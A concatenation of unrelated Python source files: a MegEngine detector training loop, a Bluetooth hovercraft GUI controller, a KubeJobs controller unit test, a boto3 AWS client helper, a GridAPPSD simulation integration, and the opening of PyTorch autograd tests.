if args.weight_file is not None:
weights = mge.load(args.weight_file)
model.backbone.bottom_up.load_state_dict(weights, strict=False)
if dist.get_world_size() > 1:
dist.bcast_list_(model.parameters(), dist.WORLD) # sync parameters
if dist.get_rank() == 0:
logger.info("Prepare dataset")
train_loader = iter(build_dataloader(args.batch_size, args.dataset_dir, model.cfg))
for epoch in range(model.cfg.max_epoch):
train_one_epoch(model, train_loader, opt, gm, epoch, args)
if dist.get_rank() == 0:
save_path = "log-of-{}/epoch_{}.pkl".format(
os.path.basename(args.file).split(".")[0], epoch
)
mge.save(
{"epoch": epoch, "state_dict": model.state_dict()}, save_path,
)
logger.info("dump weights to %s", save_path)
def train_one_epoch(model, data_queue, opt, gm, epoch, args):
def train_func(image, im_info, gt_boxes):
with gm:
loss_dict = model(image=image, im_info=im_info, gt_boxes=gt_boxes)
gm.backward(loss_dict["total_loss"])
loss_list = list(loss_dict.values())
opt.step().clear_grad()
return loss_list
meter = AverageMeter(record_len=model.cfg.num_losses)
time_meter = AverageMeter(record_len=2)
log_interval = model.cfg.log_interval
tot_step = model.cfg.nr_images_epoch // (args.batch_size * dist.get_world_size())
for step in range(tot_step):
adjust_learning_rate(opt, epoch, step, model.cfg, args)
data_tik = time.time()
mini_batch = next(data_queue)
data_tok = time.time()
tik = time.time()
loss_list = train_func(
image=mge.tensor(mini_batch["data"]),
im_info=mge.tensor(mini_batch["im_info"]),
gt_boxes=mge.tensor(mini_batch["gt_boxes"])
)
tok = time.time()
time_meter.update([tok - tik, data_tok - data_tik])
if dist.get_rank() == 0:
info_str = "e%d, %d/%d, lr:%f, "
loss_str = ", ".join(
["{}:%f".format(loss) for loss in model.cfg.losses_keys]
)
time_str = ", train_time:%.3fs, data_time:%.3fs"
log_info_str = info_str + loss_str + time_str
meter.update([loss.numpy() for loss in loss_list])
if step % log_interval == 0:
logger.info(
log_info_str,
epoch,
step,
tot_step,
opt.param_groups[0]["lr"],
*meter.average(),
*time_meter.average()
)
meter.reset()
time_meter.reset()
def adjust_learning_rate(optimizer, epoch, step, cfg, args):
base_lr = (
cfg.basic_lr * args.batch_size * (
cfg.lr_decay_rate
** bisect.bisect_right(cfg.lr_decay_stages, epoch)
)
)
# Warm up
lr_factor = 1.0
if epoch == 0 and step < cfg.warm_iters:
lr_factor = (step + 1.0) / cfg.warm_iters
for param_group in optimizer.param_groups:
param_group["lr"] = base_lr * lr_factor
def build_dataset(dataset_dir, cfg):
data_cfg = copy.deepcopy(cfg.train_dataset)
data_name = data_cfg.pop("name")
data_cfg["root"] = os.path.join(dataset_dir, data_name, data_cfg["root"])
if "ann_file" in data_cfg:
data_cfg["ann_file"] = os.path.join(dataset_dir, data_name, data_cfg["ann_file"])
data_cfg["order"] = ["image", "boxes", "boxes_category", "info"]
return data_mapper[data_name](**data_cfg)
# pylint: disable=dangerous-default-value
def build_sampler(train_dataset, batch_size, aspect_grouping=[1]):
def _compute_aspect_ratios(dataset):
aspect_ratios = []
for i in range(len(dataset)):
info = dataset.get_img_info(i)
aspect_ratios.append(info["height"] / info["width"])
return aspect_ratios
def _quantize(x, bins):
return list(map(lambda y: bisect.bisect_right(sorted(bins), y), x))
if len(aspect_grouping) == 0:
return Infinite(RandomSampler(train_dataset, batch_size, drop_last=True))
aspect_ratios = _compute_aspect_ratios(train_dataset)
group_ids = _quantize(aspect_ratios, aspect_grouping)
return Infinite(GroupedRandomSampler(train_dataset, batch_size, group_ids))
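# Illustration (assumed values): with the default aspect_grouping=[1], _quantize maps an
# image whose height/width ratio is 0.75 to group 0 and one whose ratio is 1.33 to group 1,
# so GroupedRandomSampler can batch landscape and portrait images separately.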
def build_dataloader(batch_size, dataset_dir, cfg):
train_dataset = build_dataset(dataset_dir, cfg)
train_sampler = build_sampler(train_dataset, batch_size)
train_dataloader = DataLoader(
train_dataset,
sampler=train_sampler,
transform=T.Compose(
transforms=[
T.ShortestEdgeResize(
cfg.train_image_short_size,
cfg.train_image_max_size,
sample_style="choice",
),
T.RandomHorizontalFlip(),
T.ToMode(),
],
order=["image", "boxes", "boxes_category"],
),
collator=DetectionPadCollator(),
num_workers=2,
)
return train_dataloader
if __name__ == "__main__":
main()
|
hovercraft_controler.py
|
# -*- coding: utf-8 -*-
import Tkinter
import bluetooth
#import tkMessageBox
import threading
import time
import sys
# GLOBAL VARIABLES
KOD_STERUJACY = "6000012011" # 60 000 120 1 1
# servo rear_motor bottom_motor rear_direction bottom_direction
WallWarning = "0"
ZAMEK = threading.Lock()
SwitchOff = True
# -------------------------------------------------
class NiebieskiZab():
def __init__(self):
self.ADRES_PODUSZKOWCA = "20:15:12:14:51:53"
self.PORT = 1
        self.socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM) # COMMENT OUT FOR TESTS
        self.socket.connect((self.ADRES_PODUSZKOWCA, self.PORT)) # COMMENT OUT FOR TESTS
def komunikacja(self):
global KOD_STERUJACY
global ZAMEK
global WallWarning
global SwitchOff
while SwitchOff:
ZAMEK.acquire()
message_tmp = KOD_STERUJACY
ZAMEK.release()
            message = self.string2chars2string(message_tmp) # use the snapshot taken under the lock
self.socket.send(message)
response_tmp = self.socket.recv(1024)
            response = ord(response_tmp) # convert the char to its numeric ASCII value
WallWarning = str(response)
time.sleep(0.5)
        self.socket.send(self.string2chars2string("6000000011")+"~") # turns off the rear motor after disconnecting
self.socket.close()
def string2chars2string(self, str_kod):
        # returns the string converted to ASCII characters
        # the tilde is the characteristic end-of-control-code marker
result = ( str(chr(int(str_kod[0:2]))) + str(chr(int(str_kod[2:5]))) + str(chr(int(str_kod[5:8]))) +
str(chr(int(str_kod[8]))) + str(chr(int(str_kod[9]))) + "~")
return result
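    # Worked example (for illustration): the default code "6000012011" splits into
    # "60" (servo), "000" (rear motor), "120" (bottom motor) and "1", "1" (directions),
    # so the Bluetooth frame is chr(60) + chr(0) + chr(120) + chr(1) + chr(1) + "~".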
def __del__(self):
        self.socket.close() # COMMENT OUT FOR TESTS
pass
class Gui():
def __init__(self):
        # VARIABLES
self.UpDownStep = 5
self.LeftRightStep = 1
self.MinUpDown = 0
self.MaxUpDown = 120
self.MinLeftRight = 40
self.MaxLeftRight = 80
# --------------------------------------------------------------------------------------------
self.top = Tkinter.Tk()
self.top.title("STM Hovercraft")
        self.tekst_help = Tkinter.Label(self.top, text="Hovercraft testing application")
self.power_on = Tkinter.Button(self.top, bg="green", text="ON", command=self.uruchom)
self.power_off = Tkinter.Button(self.top, bg="red", text="OFF", command=self.zamknij)
self.w_gore = Tkinter.Button(self.top, bg="blue",text="+", command=lambda: self.sterowanie("Up"))
self.w_dol = Tkinter.Button(self.top, bg="blue",text="-", command=lambda: self.sterowanie("Down"))
self.w_prawo = Tkinter.Button(self.top, bg="blue",text="->", command=lambda: self.sterowanie("Right"))
self.w_lewo = Tkinter.Button(self.top, bg="blue",text="<-", command=lambda: self.sterowanie("Left"))
self.label_skret = Tkinter.Label(self.top, text="lab1",relief=Tkinter.RIDGE)
self.label_wiatrak = Tkinter.Label(self.top,text="lab2",relief=Tkinter.RIDGE)
        self.label_przeszkoda = Tkinter.Label(self.top, text="centimeters", relief=Tkinter.RIDGE)
self.tekst_help.grid(column=1,row=1,columnspan=5,ipadx=50,ipady=10, sticky="N")
self.label_skret.grid(column=2,row=4,columnspan=2, ipadx=70,ipady=10)
self.label_wiatrak.grid(column=2,row=3,columnspan=2, ipadx=70,ipady=10)
self.power_on.grid(column=2,row=2,ipadx=30,ipady=10)
self.power_off.grid(column=3,row=2,ipadx=30,ipady=10)
self.w_gore.grid(column=0,row=2,columnspan=2,ipadx=10,ipady=30)
self.w_dol.grid(column=0,row=4,columnspan=2,ipadx=10,ipady=30)
self.w_prawo.grid(column=1,row=3,ipadx=30,ipady=10)
self.w_lewo.grid(column=0,row=3,ipadx=30,ipady=10)
self.label_przeszkoda.grid(column=2,row=5,columnspan=2, ipadx=60,ipady=10)
self.top.bind("<Up>", self.sterowanie) # nacisniety klawisz jest podawany niejawnie jako argument metody sterowanie
self.top.bind("<Down>", self.sterowanie)
self.top.bind("<Right>", self.sterowanie)
self.top.bind("<Left>", self.sterowanie)
self.update_silnik()
self.update_serwo()
self.top.protocol("WM_DELETE_WINDOW", self.quit_close)
        self.refresh() # refreshes the values when nothing is being sent over Bluetooth
self.top.mainloop()
def quit_close(self):
global SwitchOff
SwitchOff = False
sys.exit(0)
def uruchom(self):
global SwitchOff
SwitchOff = True
self.blutacz = NiebieskiZab()
self.watek_blutacza = threading.Thread(target=self.blutacz.komunikacja)
self.watek_blutacza.start()
def zamknij(self):
print "OFF"
global SwitchOff
SwitchOff = False
def refresh(self):
self.update_silnik()
self.update_serwo()
self.update_WallWarning()
self.top.after(100,self.refresh)
def update_serwo(self):
global KOD_STERUJACY
        self.label_skret.config(text="Steering: " + KOD_STERUJACY[0:2])
def update_silnik(self):
global KOD_STERUJACY
        self.label_wiatrak.config(text="Power: " + KOD_STERUJACY[2:5])
def update_WallWarning(self):
global WallWarning
        self.label_przeszkoda.config(text="Distance to obstacle: " + WallWarning + " cm")
def sterowanie(self,przycisk):
global KOD_STERUJACY
if isinstance(przycisk,str):
klawisz = przycisk
else:
klawisz = str(przycisk.keysym)
if klawisz=="Up":
if ( int(KOD_STERUJACY[2:5])+self.UpDownStep <= self.MaxUpDown ):
new_value = int(KOD_STERUJACY[2:5]) + self.UpDownStep
                uzupelnij = 3 - len(str(new_value)) # pad KOD_STERUJACY with zeros
KOD_STERUJACY = KOD_STERUJACY[:2] + uzupelnij * "0" + str(new_value) + KOD_STERUJACY[5:]
elif klawisz=="Down":
if ( int(KOD_STERUJACY[2:5])-self.UpDownStep >= self.MinUpDown ):
new_value = int(KOD_STERUJACY[2:5]) - self.UpDownStep
uzupelnij = 3 - len(str(new_value))
KOD_STERUJACY = KOD_STERUJACY[:2] + uzupelnij * "0" + str(new_value) + KOD_STERUJACY[5:]
elif klawisz=="Right":
if ( int(KOD_STERUJACY[0:2])+self.LeftRightStep <= self.MaxLeftRight ):
new_value = int(KOD_STERUJACY[0:2]) + self.LeftRightStep
KOD_STERUJACY = str(new_value) + KOD_STERUJACY[2:]
elif klawisz=="Left":
if ( int(KOD_STERUJACY[0:2])-self.LeftRightStep >= self.MinLeftRight ):
new_value = int(KOD_STERUJACY[0:2]) - self.LeftRightStep
KOD_STERUJACY = str(new_value) + KOD_STERUJACY[2:]
self.update_silnik()
self.update_serwo()
# MAIN
if __name__ == '__main__':
top = Gui()
|
test_plugin.py
|
# Copyright (c) 2017 UFCG-LSD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import threading
import unittest
from controller.exceptions import api as ex
from controller.plugins.controller.kubejobs.alarm import KubeJobs
from controller.plugins.controller.kubejobs.plugin import KubejobsController
from controller.test.unit.mocks.actuator_mock import ActuatorMock
from controller.test.unit.mocks.metric_source_mock import MetricSourceMock
"""
Class that tests the KubeJobsController components.
"""
class TestKubeJobsController(unittest.TestCase):
"""
Set up KubeJobsController object.
"""
def setUp(self):
application_id = "000001"
self.parameters = {
"control_parameters": {
"metric_source": "redis",
"schedule_strategy": "default",
"actuator": 'nop',
"trigger_down": 1,
"trigger_up": 1,
"min_rep": 2,
"max_rep": 10,
"check_interval": 1,
"actuation_size": 3},
"redis_ip": "192.168.0.0",
"redis_port": "5000",
"application_id": application_id
}
self.kubejobs1 = KubeJobs(self.parameters)
self.kubejobs1.metric_source = \
MetricSourceMock("2018-11-26T15:00:00.000Z", -2)
self.kubejobs1.actuator = ActuatorMock()
self.controller = KubejobsController(application_id, self.parameters)
self.controller.alarm = self.kubejobs1
"""
"""
def tearDown(self):
pass
"""
Test that stop application works.
"""
def test_start_stop_application(self):
thread1 = threading.Thread(
target=self.controller.start_application_scaling)
thread1.start()
self.assertTrue(self.controller.running)
while thread1.is_alive():
if self.controller.running:
self.controller.stop_application_scaling()
self.assertFalse(self.controller.running)
"""
Test that the status returned is correct.
"""
def test_status(self):
self.assertEqual("", self.controller.status())
thread1 = threading.Thread(
target=self.controller.start_application_scaling)
thread1.start()
self.assertTrue(self.controller.running)
while thread1.is_alive():
if self.controller.running:
self.controller.stop_application_scaling()
self.assertEqual("Progress error-[2018-11-26 15:00:00]--2.000000",
self.controller.status())
def test_wrong_request_body(self):
"""
Asserts that a BadRequestException will occur if
one of the parameters is missing
Args: None
Returns: None
"""
application_id = "000002"
request_error_counter = len(self.parameters["control_parameters"])
for key in self.parameters["control_parameters"]:
parameters_test = copy.deepcopy(self.parameters)
del parameters_test["control_parameters"][key]
try:
KubejobsController(application_id, parameters_test)
except ex.BadRequestException:
request_error_counter -= 1
self.assertEqual(request_error_counter, 1)
|
aws.py
|
import boto3
from .common import Common
from botocore import config as botoconf
from botocore import exceptions
from multiprocessing import Process, Pipe
class AWSSubprocessWrapper:
def __init__(self, client):
self.client = client
def __getattr__(self, attr):
if hasattr(self.client, attr):
a = getattr(self.client, attr)
if callable(a):
return AWSSubprocessWrapper.SubprocessCallWrapper(a)
return a
raise AttributeError
class SubprocessCallWrapper:
def __init__(self, target):
self.target = target
def __call__(self, *args, **kwargs):
own, remote = Pipe(False)
p = Process(target=self.execute, args=[remote, *args], kwargs=kwargs, daemon=True)
p.start()
p.join()
data = own.recv()
if isinstance(data, Exception):
raise data
return data
        def execute(self, remote, *args, **kwargs):
            try:
                data = self.target(*args, **kwargs)
            except Exception as e:
                # forward the exception to the parent process and stop;
                # `data` is never bound on this path
                remote.send(e)
                return
            remote.send(data)
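# Usage sketch (illustrative; the wrapper is currently unused, see the commented-out
# return in AWS.__call__ below). Wrapping a client runs each API call in a child
# process and re-raises any exception in the parent:
#   s3 = AWSSubprocessWrapper(boto3.client('s3'))
#   buckets = s3.list_buckets()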
class AWS:
def __init__(self):
Common.Session.context_update_hooks.append(self.idcaller)
self.idcaller()
def conf(self):
return botoconf.Config(
region_name = Common.Session.region,
signature_version = 'v4',
)
def s3conf(self):
return botoconf.Config(
region_name = Common.Session.region,
signature_version = 's3v4',
)
def env_session(self):
return boto3.Session()
def __call__(self, service, keys=None):
if service == 's3':
config = self.s3conf()
else:
config = self.conf()
client = boto3.client(
service,
aws_access_key_id=keys['access'] if keys is not None else Common.Configuration.keystore[Common.Session.context]['access'],
aws_secret_access_key=keys['secret'] if keys is not None else Common.Configuration.keystore[Common.Session.context]['secret'],
config=config,
)
#return AWSSubprocessWrapper(client)
return client
def whoami(self, keys=None):
return self('sts', keys).get_caller_identity()
def list_regions(self):
return [region['RegionName'] for region in self('ec2').describe_regions(AllRegions=True)['Regions']]
def idcaller(self):
try:
w = self.whoami()
try:
del(Common.Session.info_display.special_colors['Account'])
del(Common.Session.info_display.special_colors['UserId'])
except KeyError:
pass
Common.Session.info_display['UserId'] = w['UserId']
Common.Session.info_display['Account'] = w['Account']
except (exceptions.ClientError, KeyError) as e:
Common.Session.info_display.special_colors['UserId'] = Common.color('error')
Common.Session.info_display.special_colors['Account'] = Common.color('error')
Common.Session.info_display['UserId'] = 'ERROR'
Common.Session.info_display['Account'] = 'ERROR'
Common.Session.ui.log('ERROR: From AWS API: {0}'.format(e))
|
gridappsd_integration.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2020, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
try:
from gridappsd import GridAPPSD
from gridappsd.simulation import Simulation
from gridappsd import topics as t
import stomp
HAS_GAPPSD = True
except ImportError:
HAS_GAPPSD = False
RuntimeError('GridAPPSD must be installed before running this script ')
import os
import logging
import gevent
import weakref
from volttron.platform.agent.base_simulation_integration.base_sim_integration import BaseSimIntegration
_log = logging.getLogger(__name__)
__version__ = '1.0'
class GridAPPSDSimIntegration(BaseSimIntegration):
"""
    This class is responsible for integration with the GridAPPSD co-simulation platform.
    It provides support for registering configurations, starting, stopping, pausing and
    resuming simulations, and for publishing and receiving messages.
"""
def __init__(self, config, pubsub):
super(GridAPPSDSimIntegration, self).__init__(config)
self._work_callback = None
self.config = config
self.gridappsd = None
self.sim = None
self.event_callbacks = {}
self.topic_callbacks = {}
self.sim_id = None
def register_inputs(self, config=None, callback=None, **kwargs):
"""
Register configuration parameters with GridAppsD.
        The config parameters may include, but are not limited to:
- power_system_config
- application_config
- simulation_config
- test_config
- service_configs
        :param callback: agent callback method to register
:return:
"""
self.config = config
self._work_callback = callback
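    # Illustrative sketch (the field values are hypothetical, not taken from this module):
    #   config = {
    #       "power_system_config": {"Line_name": "ieee8500"},
    #       "simulation_config": {"duration": 120, "simulator": "GridLAB-D"},
    #   }
    #   sim_integration.register_inputs(config, callback=agent.on_simulation_message)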
def register_event_callbacks(self, callbacks={}):
"""
Register for event callbacks for event notifications such as
- on measurement change
- on timestep change
- on finish
"""
_log.debug("Registering for event callbacks")
self.event_callbacks = callbacks
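    # For example (illustrative handler names), the keys consumed by start_simulation() are:
    #   callbacks = {'MEASUREMENT': on_measurement, 'TIMESTEP': on_timestep, 'FINISH': on_finish}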
def register_topic_callbacks(self, callbacks={}):
"""
Register for any simulation topic callbacks
"""
_log.debug("Registering for topic callbacks")
self.topic_callbacks = callbacks
def start_simulation(self, *args, **kwargs):
"""
Simulation start activities involve:
- Creating GridAppsD connection gevent thread
- Registering for event callbacks (if specified)
- Registering for topic callbacks if specified
- Starting simulation based on the input config
:return:
"""
try:
self.gridappsd = GridAPPSD(override_threading=self.receiver_thread)
_log.debug('Gridappsd connected')
_log.debug(f"connection config is: {self.config}")
self.sim = Simulation(self.gridappsd, self.config)
_log.debug('Gridappsd adding onstart callback')
# Register for onstart callback to know if simulation has started
self.sim.add_onstart_callback(self.sim_on_start)
# Register event callbacks - on measurement, on timestep, on finish
for name, cb in self.event_callbacks.items():
if name == 'MEASUREMENT':
_log.debug('Gridappsd adding measurement callback')
self.sim.add_onmesurement_callback(cb)
elif name == 'TIMESTEP':
_log.debug('Gridappsd adding timestep callback')
self.sim.add_ontimestep_callback(cb)
elif name == 'FINISH':
_log.debug('Gridappsd adding finish callback')
self.sim.add_oncomplete_callback(cb)
# Register/Subscribe for simulation topics
            for topic, cb in self.topic_callbacks.items():
_log.debug('Gridappsd subscribing to topics callback')
self.gridappsd.subscribe(topic, cb)
# Starting GridAppsD simulation
self.sim.start_simulation()
_log.debug(f"Gridappsd simulation id: {self.sim.simulation_id}")
except stomp.exception.NotConnectedException as ex:
_log.error("Unable to connect to GridAPPSD: {}".format(ex))
raise ex
def sim_on_start(self, sim):
"""
Simulation on start callback to get notified when simulation starts
"""
_log.debug(f"GridAppsD simulation id inside sim_on_start(): {sim.simulation_id}")
self.sim_id = sim.simulation_id
def receiver_thread(self, arg):
"""
GridAPPSD connection thread
"""
self._receiver_thread = gevent.threading.Thread(group=None, target=arg)
self._receiver_thread.daemon = True # Don't let thread prevent termination
self._receiver_thread.start()
_log.debug('Gridappsd receiver_thread started!')
return self._receiver_thread
def publish_to_simulation(self, topic, message, **kwargs):
"""
Publish message to GridAppsD
:param topic: GridAppsD publication topic
:param message: message
:return:
"""
self.gridappsd.send(topic, message)
def pause_simulation(self, timeout=None, **kwargs):
"""
Pause the GridAppsD simulation
"""
if timeout is None:
self.sim.pause()
else:
self.sim.pause(timeout)
def resume_simulation(self, *args, **kwargs):
"""
Resume the GridAppsD simulation
"""
self.sim.resume()
def is_sim_installed(self, **kwargs):
"""
Flag to indicate if GridAppsD is installed
"""
return HAS_GAPPSD
def stop_simulation(self, *args, **kwargs):
"""
Stop the simulation if running and disconnect from GridAppsD server
:return:
"""
_log.debug('Stopping the simulation')
try:
if self.sim_id is not None:
self.sim.stop()
_log.debug('Disconnect GridAppsd')
if self.gridappsd is not None:
self.gridappsd.disconnect()
except Exception:
_log.error("Error stop GridAPPSD simulation")
|
test_autograd.py
|
import gc
import io
import math
import os
import random
import sys
import tempfile
import threading
import time
import unittest
import uuid
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, record_function, emit_nvtx)
from torch.autograd.profiler_util import (_format_time, EventList, FunctionEvent, FunctionEventAvg)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing import make_tensor
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
from torch.testing._internal.common_dtype import get_all_dtypes
import pickle
PRECISION = 1e-4
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
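# Illustrative example (assumed, not asserted by the tests below): for a leaf tensor
# x with requires_grad=True, graph_desc((x + x).grad_fn) might look like
# 'AddBackward0(AccumulateGrad(), AccumulateGrad())'.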
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
